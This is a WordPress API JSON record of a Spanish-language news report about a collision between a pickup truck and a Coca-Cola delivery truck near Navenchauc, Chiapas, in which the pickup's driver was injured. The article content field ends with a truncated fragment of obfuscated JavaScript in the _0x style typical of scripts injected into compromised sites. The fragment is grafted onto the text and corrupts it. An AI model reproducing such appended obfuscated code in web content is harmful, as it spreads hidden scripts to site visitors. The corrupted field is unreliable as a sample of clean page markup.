{"id":23869,"date":"2025-09-10T03:10:29","date_gmt":"2025-09-10T03:10:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23869"},"modified":"2025-09-10T03:10:30","modified_gmt":"2025-09-10T03:10:30","slug":"choque-entre-camioneta-y-camion-de-coca-cola-en-la-via-san-cristobal-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23869","title":{"rendered":"Choque entre camioneta y cami\u00f3n de Coca-Cola en la v\u00eda San Crist\u00f3bal\u2013Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325550-768x1024.jpg\" alt=\"\" class=\"wp-image-23870\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325550-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325550-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000325550.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<br>San Crist\u00f3bal de Las Casas, 9 de septiembre de 2025.\u2013 Un aparatoso accidente se registr\u00f3 en la v\u00eda libre San Crist\u00f3bal\u2013Tuxtla Guti\u00e9rrez, a la altura de la comunidad Navenchauc, donde una camioneta particular se impact\u00f3 contra un cami\u00f3n repartidor de la empresa Coca-Cola.<\/p>\n\n\n\n<p>El conductor de la camioneta result\u00f3 lesionado y fue auxiliado por cuerpos de emergencia que acudieron al lugar. El tr\u00e1nsito en la zona se vio afectado por varios minutos mientras se realizaban las labores de atenci\u00f3n y retiro de las unidades involucradas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsalSan Crist\u00f3bal de Las Casas, 9 de septiembre de 2025.\u2013 Un aparatoso accidente se registr\u00f3 en la v\u00eda libre San Crist\u00f3bal\u2013Tuxtla Guti\u00e9rrez, a la altura de la comunidad Navenchauc, donde una camioneta particular se impact\u00f3 contra un cami\u00f3n repartidor de la empresa Coca-Cola. El conductor de la camioneta result\u00f3 lesionado y fue auxiliado por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23870,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23869","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23869","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23869"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23869\/revisions"}],"predecessor-version":[{"id":23871,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23869\/revisions\/23871"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23870"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23869"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}